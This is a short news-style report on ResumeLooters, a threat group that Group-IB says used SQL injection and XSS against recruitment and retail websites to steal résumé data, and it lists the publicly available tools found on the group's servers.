Resumelooters

ResumeLooters, a threat actor group identified by cybersecurity firm Group-IB in November 2023, has been actively exploiting web vulnerabilities to steal personal data. The group mainly targets victims in India, Taiwan, Thailand, Vietnam, China, and Australia, utilizing SQL injection attacks and Cross-Site Scripting (XSS) techniques to infiltrate systems. In one instance, the threat actor created a fake employer profile on a legitimate recruitment website, injecting malicious XSS script into one of the fields in the profile. This allowed them to siphon off emails and other personal information from people's resumes, as revealed by researchers in a blog post published on February 6, 2024. The group's modus operandi involves inserting XSS scripts into all possible web forms on targeted websites, with the aim of displaying phishing forms to obtain admin credentials. Group-IB discovered evidence of various penetration testing tools on ResumeLooters' malicious servers, including sqlmap, Acunetix, Beef Framework, X-Ray, Metasploit, ARL (Asset Reconnaissance Lighthouse), and Dirsearch. These tools were used to target employment websites and retail companies, indicating a broad range of potential victims. Despite their destructive capabilities, both ResumeLooters and another similar group called GambleForce employ straightforward attack methods that are easily avoidable. This highlights the importance for organizations to prioritize cybersecurity measures and remain vigilant against evolving threats. As Nikita Rostovcev, a senior threat analyst at Group-IB, noted, "ResumeLooters is yet another example of how much damage can be made with just a handful of publicly available tools." The discovery of this malicious campaign underscores the need for comprehensive security protocols, particularly in sectors handling sensitive personal data.